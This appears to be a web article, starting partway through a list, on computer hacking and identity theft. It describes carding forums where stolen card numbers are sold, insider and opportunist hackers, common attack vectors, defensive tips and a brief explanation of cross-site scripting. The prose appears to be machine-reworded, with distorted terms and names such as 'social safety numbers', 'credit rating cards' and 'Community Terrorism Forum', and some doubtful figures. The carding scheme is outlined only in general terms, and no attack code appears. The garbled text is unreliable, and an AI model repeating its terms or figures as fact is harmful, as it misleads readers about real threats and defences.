2.Hacking accounted for the largest quantity of compromised personalized records inside the final 12 months, involving an estimated 43 million Americans.

3.Well-known brands which have lost data via personal computer hacking from the past 18 months involve DSW Shoes, Polo Ralph Lauren, and BJ's Wholesale.

What occurs to stolen credit card and social safety numbers?

Very much from the data stolen by means of pc hacking — including stolen bank card numbers and Social Security Numbers — will end up on a community of illegal trading web-sites exactly where hackers and criminals from around the globe will openly obtain and promote massive quantities of personal info for profit.

Stolen data networks have flourished in the open, with names like Community Terrorism Forum, Shadowcrew, Carderplanet, Dark Profits, and Mazafaka. The Shadowcrew network was believed to have over four,000 active customers who made over $5 million in much less than two years trading 1.5 million stolen credit rating cards, before it was shut down.

A typical charge card hacking transaction on a single of these sites might take place as follows:

1. Stolen charge card numbers and other private information are posted for sale, either to be purchased or employed inside a "joint venture."

2. Inside a joint venture, other community customers will use stolen numbers to buy goods and send them to a drop website for pick-up by other customers. The goods are then sold and the proceeds shared amongst the participants.

3.New or unproven sellers around the plastic card hacking community are typically required to prove their credibility by participating within a number of dummy runs to test that both the seller and also the stolen cards are genuine.

Some bank card hacking websites will also incorporate a rating system, exactly where customers can post feedback on the high quality of stolen bank card numbers and other information offered for sale by members. And a lot of of these laptop or computer id theft web sites will accept requests for particular kinds of stolen details and will also sell complete phishing sites and email templates so that even absolute beginners can very easily run phishing scams with little technical information.

There has also been a shift from the expert pc hacking community, in which hackers who utilized to do it for the thrill or the fame are now doing it for profit. In the words of one particular hacker, "In the old days of hacking it was a bit like base-jumping the Chrysler building. All you got was a slap for the wrist and front page headline."

But now hackers are facing serious jail time for even the smallest hack and they want to make hacking worth the risk. In most cases, all they do is discover the opening, commit identity theft, and then market the stolen charge card numbers; or just locate the bank card hacking opportunity and promote that info for others to complete the stealing.

Another source of laptop identity theft entails former staff hacking into the networks and computer systems of their old job, using either insider information or password accounts that have been never cancelled. For example, the thief who stole 30,000 credit ratings information from his employer in New York committed the crime over a two-year period following he left the business. The price of his crime was estimated at more than $100 million.

He simply employed his insider knowledge and a password that a person forgot to cancel. And if staff are disgruntled or angry right after they leave the business, maybe mainly because they have been fired, they might justify their actions by convincing themselves it's "just compensation" for funds they must have been paid.

Opportunist hackers also continue to be a issue. These are amateurs and professionals who spend hours a day running random port scans to the Net searching for unprotected residence desktops. When they come across 1, they'll generally just poke around inside the community or pc to see what's worth taking, and these days they know that any personal or buyer info on that laptop will be of value to an individual somewhere.

And with nearly 4,000 hacking websites to the web, any petty criminal can now learn how to become an accomplished hacker no cost of charge, and possibly earn a considerably far better living for a lot much less threat. The criminals who employed to lurk in doorways armed with a crowbar now lurk in front of laptops armed with a chai latte. These guys know that it is very much easier to break into a organization through the Web to commit id theft than as a result of a skylight, and there's no chance of being bitten by the owner's Doberman.

Small organizations personal computer systems are particularly vulnerable to identification theft, simply because they normally offer simple and unguarded access to things like client bank card records and employee payroll files. Most small companies don't use or keep access logs, so even if their data has been stolen, they probably won't even know it.

How computer Hacking Takes place

Hacking attacks could be launched within a number of means:

1. Attacking personal computers that don't have firewalls installed.

2.Installing keystroke loggers or other malicious code by hiding it in email attachments.

3.Exploiting browser vulnerabilities that have not been correctly patched.

4.Exploiting weak or poorly protected passwords.

5. Hiding malicious code in downloads or cost-free software.

6.Hiding malicious code in images on sites and waiting for unsuspecting users to click on them.

7.Employees or other trusted users merely accessing an unprotected laptop or computer.

8.Exploiting poorly installed networks, and specifically wireless household networks.

So What Can You Do About computer Hacking?

1. Make positive all personal computers you use in your household or business enterprise have the most recent firewalls and anti-virus software put in.

2. Hold up-to-date with the newest patches, specially for your browser.

3.Use a good-quality anti-spyware solution, and scan your computers regularly for any pests.

4.Be careful about the types of internet websites you pay a visit to, what you click on, and what you download. And make certain that everyone who uses your laptop understands the security risks and rules.

5.Scrutinize suspicious emails that may really be phishing scams.

Pay a visit to the the Privacy Matters IdentitySM Learning Center for news feeds concerning the most recent security breaches, scams as well as other threats to identification theft.

What is Cross site Scripting (XSS)?

Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website,
instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious javascript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post.
MORE HACKS: Hacktips, Network hacking, Twitter Hacks, windows hacks, wireless hacking